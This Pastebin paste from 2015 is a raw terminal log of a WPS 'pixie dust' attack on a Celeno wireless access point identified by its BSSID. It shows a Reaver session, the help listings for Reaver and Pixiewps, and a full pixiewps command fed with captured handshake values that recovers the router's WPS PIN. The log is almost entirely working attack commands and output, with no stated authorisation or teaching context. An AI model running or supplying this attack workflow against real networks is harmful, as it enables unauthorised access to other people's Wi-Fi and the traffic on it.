Advertisement
Guest User

Untitled

a guest
Aug 11th, 2015
1,541
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.31 KB | None | 0 0
  1. [+] Trying pin 01231234.
  2. [+] Sending EAPOL START request
  3. [+] Received identity request
  4. [+] Sending identity response
  5. [P] E-Nonce: d2:7d:cf:e4:e2:ef:78:63:af:24:7e:25:93:73:26:1f
  6. [P] PKE: a6:fd:2d:26:aa:dc:8e:c3:67:15:3f:0e:98:61:f1:12:d6:a4:c3:fe:67:ae:c7:21:47:b5:e4:e7:39:22:2b:e8:4c:f7:35:07:65:4d:ac:9f:b9:6e:94:30:18:8e:c9:b3:30:5f:e6:b0:62:26:7c:96:37:ab:87:bf:71:cd:5c:01:ea:f9:32:15:cc:92:a2:be:68:50:f3:15:ce:d1:8c:71:8e:a8:f5:2e:59:71:69:83:43:a1:98:30:87:c8:77:d2:7b:4b:1e:79:5b:5b:68:df:2b:5c:06:6d:65:be:be:4a:64:07:b8:1f:a5:c0:5b:8b:95:28:ad:89:79:f3:a0:b5:e0:0e:31:5a:74:df:cc:e9:6f:8e:ec:78:f8:bb:d3:a1:82:df:3d:6e:65:20:59:6b:95:da:2b:36:64:aa:94:74:14:7b:9f:1a:ed:f9:12:e9:ce:8e:52:97:97:d0:52:21:f5:81:96:d9:67:2b:24:dc:a9:b0:e2:e9:01:58:ef:f7
  7. [P] WPS Manufacturer: Celeno Communication, Inc.
  8. [P] WPS Model Name: Celeno Wireless AP 2.4G
  9. [P] WPS Model Number: CL1800
  10. [P] Access Point Serial Number: 12345678
  11. [+] Received M1 message
  12. [P] R-Nonce: 70:98:5f:fa:f9:ea:61:1d:84:6a:1b:3b:80:7c:83:ad
  13. [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
  14. [P] AuthKey: 6c:5e:cf:cc:78:40:ee:87:55:8d:79:ad:78:ff:d8:84:65:70:a6:f7:29:cc:f1:af:50:06:e6:06:e9:b0:6e:95
  15. [+] Sending M2 message
  16. [P] E-Hash1: 8b:2f:57:ed:7b:9b:b7:35:ce:15:6a:d0:78:e8:c1:17:42:16:dd:96:25:9d:41:25:6a:b4:9e:7e:18:cb:61:ec
  17. [P] E-Hash2: eb:58:f4:dd:0a:86:7a:b8:eb:18:2e:c4:56:b2:34:7f:36:6c:45:e6:d9:00:a1:7b:cb:51:d6:e8:a5:1d:4d:1e
  18. [+] Received M3 message
  19. [+] Sending M4 message
  20. [+] Received WSC NACK
  21. [+] Sending WSC NACK
  22. [+] p1_index set to 3
  23. [+] Pin count advanced: 3. Max pin attempts: 20000
  24. [!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
  25. ^C[+] Session saved.
  26. root@pc9:~# reaver -i wlan0mon -S -vv -c 1 --bssid C0:AC:54:0A:3D:50 --help
  27. Reaver v1.5.2 WiFi Protected Setup Attack Tool
  28. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  29. mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
  30.  
  31. [+] Switching wlan0mon to channel 1
  32. Required Arguments:
  33. -i, --interface=<wlan> Name of the monitor-mode interface to use
  34. -b, --bssid=<mac> BSSID of the target AP
  35.  
  36. Optional Arguments:
  37. -m, --mac=<mac> MAC of the host system
  38. -e, --essid=<ssid> ESSID of the target AP
  39. -c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
  40. -o, --out-file=<file> Send output to a log file [stdout]
  41. -s, --session=<file> Restore a previous session file
  42. -C, --exec=<command> Execute the supplied command upon successful pin recovery
  43. -D, --daemonize Daemonize reaver
  44. -a, --auto Auto detect the best advanced options for the target AP
  45. -f, --fixed Disable channel hopping
  46. -5, --5ghz Use 5GHz 802.11 channels
  47. -v, --verbose Display non-critical warnings (-vv for more)
  48. -q, --quiet Only display critical messages
  49. -K --pixie-dust=<number> [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
  50. -Z, --no-auto-pass Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
  51. -h, --help Show help
  52.  
  53. Advanced Options:
  54. -p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
  55. -d, --delay=<seconds> Set the delay between pin attempts [1]
  56. -l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
  57. -g, --max-attempts=<num> Quit after num pin attempts
  58. -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
  59. -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
  60. -t, --timeout=<seconds> Set the receive timeout period [5]
  61. -T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
  62. -A, --no-associate Do not associate with the AP (association must be done by another application)
  63. -N, --no-nacks Do not send NACK messages when out of order packets are received
  64. -S, --dh-small Use small DH keys to improve crack speed
  65. -L, --ignore-locks Ignore locked state reported by the target AP
  66. -E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
  67. -n, --nack Target AP always sends a NACK [Auto]
  68. -w, --win7 Mimic a Windows 7 registrar [False]
  69. -X, --exhaustive Set exhaustive mode from the beginning of the session [False]
  70. -1, --p1-index Set initial array index for the first half of the pin [False]
  71. -2, --p2-index Set initial array index for the second half of the pin [False]
  72. -P, --pixiedust-loop Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
  73. -W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link
  74.  
  75. Example:
  76. reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
  77.  
  78. root@pc9:~# pixiewps
  79.  
  80. Pixiewps 1.1 WPS pixie dust attack tool
  81. Copyright (c) 2015, wiire <wi7ire@gmail.com>
  82.  
  83. Usage: pixiewps <arguments>
  84.  
  85. Required Arguments:
  86.  
  87. -e, --pke : Enrollee public key
  88. -r, --pkr : Registrar public key
  89. -s, --e-hash1 : Enrollee Hash1
  90. -z, --e-hash2 : Enrollee Hash2
  91. -a, --authkey : Authentication session key
  92.  
  93. Optional Arguments:
  94.  
  95. -n, --e-nonce : Enrollee nonce (mode 2,3,4)
  96. -m, --r-nonce : Registrar nonce
  97. -b, --e-bssid : Enrollee BSSID
  98. -S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
  99. -f, --force : Bruteforce the whole keyspace (mode 4) [No]
  100. -v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
  101.  
  102. -h, --help : Display this usage screen
  103.  
  104. Examples:
  105.  
  106. pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
  107. pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
  108. pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
  109.  
  110. [!] Not all required arguments have been supplied!
  111.  
  112. root@pc9:~# pixiewps -e a6:fd:2d:26:aa:dc:8e:c3:67:15:3f:0e:98:61:f1:12:d6:a4:c3:fe:67:ae:c7:21:47:b5:e4:e7:39:22:2b:e8:4c:f7:35:07:65:4d:ac:9f:b9:6e:94:30:18:8e:c9:b3:30:5f:e6:b0:62:26:7c:96:37:ab:87:bf:71:cd:5c:01:ea:f9:32:15:cc:92:a2:be:68:50:f3:15:ce:d1:8c:71:8e:a8:f5:2e:59:71:69:83:43:a1:98:30:87:c8:77:d2:7b:4b:1e:79:5b:5b:68:df:2b:5c:06:6d:65:be:be:4a:64:07:b8:1f:a5:c0:5b:8b:95:28:ad:89:79:f3:a0:b5:e0:0e:31:5a:74:df:cc:e9:6f:8e:ec:78:f8:bb:d3:a1:82:df:3d:6e:65:20:59:6b:95:da:2b:36:64:aa:94:74:14:7b:9f:1a:ed:f9:12:e9:ce:8e:52:97:97:d0:52:21:f5:81:96:d9:67:2b:24:dc:a9:b0:e2:e9:01:58:ef:f7 -r 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02 -s 8b:2f:57:ed:7b:9b:b7:35:ce:15:6a:d0:78:e8:c1:17:42:16:dd:96:25:9d:41:25:6a:b4:9e:7e:18:cb:61:ec -z eb:58:f4:dd:0a:86:7a:b8:eb:18:2e:c4:56:b2:34:7f:36:6c:45:e6:d9:00:a1:7b:cb:51:d6:e8:a5:1d:4d:1e -a 6c:5e:cf:cc:78:40:ee:87:55:8d:79:ad:78:ff:d8:84:65:70:a6:f7:29:cc:f1:af:50:06:e6:06:e9:b0:6e:95 -n d2:7d:cf:e4:e2:ef:78:63:af:24:7e:25:93:73:26:1f
  113.  
  114. Pixiewps 1.1
  115.  
  116. [*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
  117. [*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
  118. [+] WPS pin: 06710569
  119.  
  120. [*] Time taken: 0 s
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement